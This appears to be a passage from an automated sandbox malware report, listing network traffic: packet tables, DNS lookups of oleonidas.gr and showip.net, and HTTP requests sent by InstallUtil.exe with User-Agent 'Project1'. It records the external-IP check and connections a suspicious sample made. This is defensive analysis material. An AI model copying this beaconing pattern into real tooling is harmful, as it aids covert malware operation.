Nov 9, 2024 09:20:45.712800980 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.712857962 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.713839054 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.713898897 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.756139994 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.756239891 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.828030109 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.828111887 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.828883886 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.828969955 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.829529047 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.829612017 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.830292940 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.830372095 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.831039906 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.831120968 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.871296883 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.871368885 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.945040941 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.945235014 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.946324110 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.946412086 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.946816921 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.946877003 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.947799921 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.947860956 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.949062109 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.949140072 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.988442898 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.988524914 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.033828020 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.033905983 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.062408924 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.062474012 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.063083887 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.063138962 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.064063072 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.064126015 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.064665079 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.064728022 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.065418005 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.065479994 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.105870008 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.105941057 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.152364969 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.152463913 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.179835081 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.179932117 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.180686951 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.180743933 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.181592941 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.181648970 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.182324886 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.182383060 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.183183908 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.183243990 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.222999096 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.223093033 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.268611908 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.268696070 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.297128916 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.297211885 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.297888041 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.297949076 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.298572063 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.298643112 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.299649954 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.299722910 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.300554037 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.300632954 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.340001106 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.340105057 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.342108965 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.342195988 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.413974047 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.414098024 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.414741039 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.414817095 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.415236950 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.415297031 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.416527987 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.416594028 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.417424917 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.417489052 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.418162107 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.418225050 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.457560062 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.457633972 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.501418114 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.501509905 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.531282902 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.531368017 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.532113075 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.532176971 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.532627106 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.532685995 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.533795118 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.534168005 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.534698009 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.534770966 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.535597086 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.535666943 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.574203968 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.574270964 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.576849937 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.576931953 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.620455027 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.620594978 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.648638964 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.648715019 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:46.648835897 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:46.651747942 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:55.487003088 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:55.491883039 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:55.492054939 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:55.492217064 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:55.496983051 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.346700907 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.346744061 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.346755028 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.346797943 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.346846104 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.346887112 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.346896887 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.346910000 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.346931934 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.346967936 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.347177029 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.347256899 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.347332001 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.347342968 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.347354889 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.347465038 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.351689100 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.351768017 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.351807117 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.351870060 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.351936102 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.351936102 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.351958990 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.352097988 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.474292040 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.474318027 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.474396944 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.474400997 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.474435091 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.474514961 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.474625111 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.474637985 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.474647999 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.474679947 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.474837065 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.474997997 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.475011110 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.475090027 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.475281000 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.475856066 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:56.702275038 CET	80	56543	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:56.702656031 CET	56543	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:22:23.199801922 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:22:23.205354929 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:22:23.205442905 CET	49705	80	192.168.2.5	162.55.60.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2024 09:20:21.460283041 CET	55837	53	192.168.2.5	1.1.1.1
Nov 9, 2024 09:20:21.678308010 CET	53	55837	1.1.1.1	192.168.2.5
Nov 9, 2024 09:20:33.237282038 CET	60446	53	192.168.2.5	1.1.1.1
Nov 9, 2024 09:20:33.251792908 CET	53	60446	1.1.1.1	192.168.2.5
Nov 9, 2024 09:20:42.658667088 CET	53	58572	1.1.1.1	192.168.2.5
Nov 9, 2024 09:20:57.392769098 CET	53	57199	162.159.36.2	192.168.2.5
Nov 9, 2024 09:20:58.053936005 CET	52990	53	192.168.2.5	1.1.1.1
Nov 9, 2024 09:20:58.096959114 CET	53	52990	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 9, 2024 09:20:21.460283041 CET	192.168.2.5	1.1.1.1	0x401d	Standard query (0)	www.oleonidas.gr	A (IP address)	IN (0x0001)	false
Nov 9, 2024 09:20:33.237282038 CET	192.168.2.5	1.1.1.1	0xff09	Standard query (0)	showip.net	A (IP address)	IN (0x0001)	false
Nov 9, 2024 09:20:58.053936005 CET	192.168.2.5	1.1.1.1	0x6283	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 9, 2024 09:20:21.678308010 CET	1.1.1.1	192.168.2.5	0x401d	No error (0)	www.oleonidas.gr	oleonidas.gr		CNAME (Canonical name)	IN (0x0001)	false
Nov 9, 2024 09:20:21.678308010 CET	1.1.1.1	192.168.2.5	0x401d	No error (0)	oleonidas.gr		185.78.221.73	A (IP address)	IN (0x0001)	false
Nov 9, 2024 09:20:33.251792908 CET	1.1.1.1	192.168.2.5	0xff09	No error (0)	showip.net		162.55.60.2	A (IP address)	IN (0x0001)	false
Nov 9, 2024 09:20:58.096959114 CET	1.1.1.1	192.168.2.5	0x6283	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

www.oleonidas.gr

showip.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	162.55.60.2	80	5804	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 09:20:33.277642012 CET	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
Nov 9, 2024 09:20:34.319108963 CET	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Sat, 09 Nov 2024 08:20:34 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Nov 9, 2024 09:20:34.319129944 CET	1236	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;
Nov 9, 2024 09:20:34.319140911 CET	1236	IN	Data Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
Nov 9, 2024 09:20:34.319394112 CET	388	IN	Data Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20 Data Ascii: ge"))\|\|(C()?A("Microsoft Edge"):B("Edg/"))\|\|C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
Nov 9, 2024 09:20:34.319406986 CET	1236	IN	Data Raw: 61 72 20 62 3d 48 28 61 29 3b 31 21 3d 3d 28 62 26 31 29 26 26 28 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a 65 6e 28 61 29 26 26 28 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 29 2c 49 28 61 2c 62 7c Data Ascii: ar b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.call(a)),I(a,b\|1))} var H=F?function(a){return a[F]\|0}:function(a){return a.g\|0},J=F?function(a){return a[F]}:function(a){return a.g},I=F?function(a,b){a[F]=b}:function(a
Nov 9, 2024 09:20:34.319417953 CET	1236	IN	Data Raw: 65 3d 61 2e 6c 65 6e 67 74 68 2c 66 3d 64 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 61 5b 66 5d 3b 6e 75 6c 6c 21 3d 67 26 26 67 21 3d 3d 63 26 26 28 63 5b 66 2d 62 5d 3d 67 29 7d 61 2e 6c 65 6e 67 74 68 3d 64 2b 31 3b 61 5b 64 5d 3d 63 7d Data Ascii: e=a.length,f=d;f<e;f++){var g=a[f];null!=g&&g!==c&&(c[f-b]=g)}a.length=d+1;a[d]=c};function Aa(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "boolean":return a?1:0;case "object":if(a&&!Array.isArray(a)&&ta&&null!=a&&a i
Nov 9, 2024 09:20:34.319430113 CET	1236	IN	Data Raw: 28 65 2c 66 29 26 26 28 62 5b 66 5d 3d 63 28 65 5b 66 5d 29 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 44 61 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 69 66 28 6e 75 6c 6c 21 3d 61 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 Data Ascii: (e,f)&&(b[f]=c(e[f]))}return a}function Da(a,b,c,d,e,f){if(null!=a){if(Array.isArray(a))a=e&&0==a.length&&H(a)&1?void 0:f&&H(a)&2?a:Ea(a,b,c,void 0!==d,e,f);else if(N(a)){var g={},h;for(h in a)Object.prototype.hasOwnProperty.call(a,h)&&(g[h]=D
Nov 9, 2024 09:20:34.319441080 CET	1236	IN	Data Raw: 66 28 63 3e 3d 66 7c 7c 65 29 7b 65 3d 62 3b 69 66 28 62 26 32 35 36 29 66 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 64 29 72 65 74 75 72 6e 3b 66 3d 61 5b 66 2b 28 28 62 3e 3e 39 26 31 29 2d 31 29 5d Data Ascii: f(c>=f\|\|e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e\|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)} function La(a,b){var c
Nov 9, 2024 09:20:34.320147991 CET	848	IN	Data Raw: 72 65 61 6b 7d 66 3d 21 30 7d 65 3d 62 3b 63 3d 21 63 3b 67 3d 4a 28 61 2e 68 29 3b 61 3d 4c 28 67 29 3b 67 3d 28 67 3e 3e 39 26 31 29 2d 31 3b 66 6f 72 28 76 61 72 20 68 2c 6b 2c 77 3d 30 3b 77 3c 64 2e 6c 65 6e 67 74 68 3b 77 2b 2b 29 69 66 28 Data Ascii: reak}f=!0}e=b;c=!c;g=J(a.h);a=L(g);g=(g>>9&1)-1;for(var h,k,w=0;w<d.length;w++)if(k=d[w],k<a){k+=g;var r=e[k];null==r?e[k]=c?O:wa():c&&r!==O&&va(r)}else h\|\|(r=void 0,e.length&&N(r=e[e.length-1])?h=r:e.push(h={})),r=h[k],null==h[k]?h[k]=c?O:wa(
Nov 9, 2024 09:20:34.320159912 CET	1236	IN	Data Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648Math.random()).toString(36)+Math.abs(Math.floor(2147483648Math.random())
Nov 9, 2024 09:20:34.320173025 CET	1236	IN	Data Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59 Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	56543	162.55.60.2	80	5340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 09:20:55.492217064 CET	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
Nov 9, 2024 09:20:56.346700907 CET	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Sat, 09 Nov 2024 08:20:56 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async 